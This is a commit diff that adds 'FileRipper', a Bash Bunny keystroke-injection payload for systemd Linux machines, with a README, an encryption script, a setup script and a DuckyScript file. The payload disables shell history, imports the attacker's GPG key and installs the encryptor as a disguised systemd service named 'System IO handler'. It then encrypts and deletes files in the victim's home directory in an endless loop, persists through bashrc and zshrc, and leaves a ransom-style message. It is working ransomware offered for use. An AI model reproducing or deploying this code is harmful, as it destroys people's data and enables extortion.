uploaded FileRipper

Faster executing version

payloads/library/execution/FileRipper/README.md

@@ -0,0 +1,51 @@
+## About:
+* Title: FileRipper
+* Description: FileRipper is a payload which encrypts users data.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Execution
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## FileRipper: FileRipper is a payload which encrypts users data using asymmetric cipher.
+
+### Features:
+* Encrypts personal files and directories in home directory.
+* Decryptable using private key.
+* Persistent.
+* Autostart payload on boot.
+
+### Workflow:
+1. Stop storing history, this helps to keep tracks clear from begining.
+2. Importing Public GPG key.
+3. Creating non-root systemd service.
+4. Deploying fileRipper.
+5. Autostarting service on opening terminal with shell (bash and zsh).
+6. Entering Message. 
+
+### Directory Structure of payload components:
+| FileName       | Directory                     |
+| -------------- | ----------------------------- |
+| payload.txt    | /payload/switch1/             |
+| payload.sh     | /payload/                     |
+| fileRipper     | /tools/                       |
+| public.pub     | /tools/                       |
+
+### Changes to be made:
+* Replace key name "alice" with your key name in payload.sh on line no ```50```.
+* Replace key name "alice" with your key name in fileRipper on line no ```6```.
+
+### Usage:
+* #### Create new key pair: 
+ ```gpg --full-gen-key --expert```
+* #### Dump public key of freshly created gpg key: 
+ ```gpg --armor --export <key name> > public.pub``` 
+
+### LED Status:
+* `SETUP`   : MAGENTA
+* `ATTACK`  : YELLOW
+* `FINISH`  : GREEN
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n 
+

payloads/library/execution/FileRipper/fileRipper

@@ -0,0 +1,11 @@
+#!/bin/sh
+cd ~/
+encrypt(){
+	dirFile=$(ls | head -n 1)
+	tar cf ~/.crypttt/$dirFile.tar.gz --exclude='.' --exclude='..' --exclude='.crypttt' --remove-files $dirFile
+	gpg -e -r alice -o ~/.crypttt/$dirFile.tar.gpg ~/.crypttt/$dirFile.tar.gz && rm -rf ~/.crypttt/$dirFile.tar.gz
+}
+for (( ; ; ))
+do
+	encrypt
+done

payloads/library/execution/FileRipper/payload.sh

@@ -0,0 +1,15 @@
+#!/bin/bash
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+cp -r $mntt/tools/public.pub /tmp
+gpg --import /tmp/public.pub
+rm /tmp/public.pub
+mkdir ~/.crypttt
+mkdir -p ~/.config/systemd/user 
+echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysCall -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/libSystemIO.service
+mkdir /var/tmp/.system
+cp -r $mntt/tools/fileRipper /var/tmp/.system/sysCall
+chmod +x /var/tmp/.system/sysCall
+echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"echo Enter Your message here\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"echo Enter Your message here\" >> ~/.bashrc\nfi" > ~/tmmmp
+chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp

payloads/library/execution/FileRipper/payload.txt

@@ -0,0 +1,99 @@
+# Title: FileRipper
+# Description: FileRipper is a payload which encrypts users data.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: Unix-like operating systems with systemd.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [executing payload script]
+Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh
+Q ENTER
+Q DELAY 2000
+Q STRING rm /tmp/payload.sh
+Q ENTER
+Q DELAY 500
+# REM replace 'alice' with name of your key
+Q STRING gpg --edit-key alice
+Q ENTER
+Q DELAY 300
+Q STRING trust
+Q ENTER
+Q DELAY 200
+Q STRING 5
+Q ENTER
+Q DELAY 190
+Q STRING y
+Q ENTER
+Q CTRL c
+Q DELAY 200
+Q STRING gpg --check-trustdb
+Q ENTER
+Q STRING gpg --update-trustdb
+Q ENTER
+Q DELAY 300
+Q STRING systemctl --user enable --now libSystemIO.service
+Q ENTER
+Q DELAY 300
+Q STRING systemctl --user start libSystemIO.service
+Q ENTER
+Q DELAY 100
+Q DELAY 200
+
+# REM [autostart on opening terminal]
+Q STRING echo systemctl --user enable --now libSystemIO.service >> ~/.zshrc
+Q ENTER
+Q DELAY 200
+Q STRING echo systemctl --user enable --now libSystemIO.service >> ~/.bashrc
+Q ENTER
+
+# REM [Message]
+# REM Remove this block if you dont want to prompt message to victim.
+# REM Change your message.
+Q ENTER
+Q DELAY 100
+Q STRING echo "echo Enter Your Message Here" >> ~/.bashrc
+Q ENETR
+Q STRING echo "echo Enter Your Message Here" >> ~/.zshrc
+Q ENTER
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+# Q STRING exit
+Q ENTER 
+LED FINISH